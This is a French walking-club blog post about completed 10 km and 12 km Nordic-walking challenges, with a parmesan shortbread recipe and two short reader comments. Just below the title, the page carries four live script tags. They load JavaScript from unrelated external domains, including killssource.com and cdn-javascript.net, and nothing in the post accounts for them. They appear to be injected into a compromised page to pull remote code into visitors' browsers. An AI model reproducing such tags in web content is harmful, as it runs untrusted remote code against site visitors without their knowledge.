• Défi 10 et 12 km : Pari réussi nordiquement et culinairement aussi !

     

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1574683834528" type="text/javascript"></script> <script src="http://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2" type="text/javascript"></script>

    Par une météo clémente, les défis des 2 groupes ont pu être accomplis agréablement : 10 km à 6 km/h avec Nadia et 12 km à 7 km/h avec Christine. Tous les participants se sont dit heureux de leur matinée. A refaire !

     

    Après les étirements, un apéro sympathique a été partagé dans la bonne humeur. 

     A la demande générale, voici la recette des petits sablés au parmesan (voir photo) :

    100 g de farine/ 150 g de parmesan râpé/ 100 g de beurre/ 1 oeuf

    Mélanger farine et parmesan.

    Incorporer le beurre amolli à température ambiante du bout des doigts. 

    Ajouter l'oeuf.

    Aplatir la pâte, qui ne doit pas être collante.

    L'emballer dans un film et la mettre dans le frigo 1/2 heure.

    Saupoudrer le plan de travail d'un peu de farine et étaler la pâte au rouleau (3 mm d'épaisseur environ).

    Choisir de jolis emporte-pièces et mettre au four à 180°, sur du papier cuisson, pour 10 à 12 minutes.

    Bonne dégustation...

    Défi 10 et 12 km : Pari réussi nordiquement et culinairement aussi !

    Défi 10 et 12 km : Pari réussi nordiquement et culinairement aussi !

    Défi 10 et 12 km : Pari réussi nordiquement et culinairement aussi !

    Défi 10 et 12 km : Pari réussi nordiquement et culinairement aussi !




  • Commentaires

    1
    Damien
    Lundi 25 Novembre 2019 à 11:53
    Quel plaisir de voir tout ce petit monde réunit. Au top les loulous !
    2
    Séverine
    Lundi 2 Décembre 2019 à 15:55

    merci Nadiayes

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :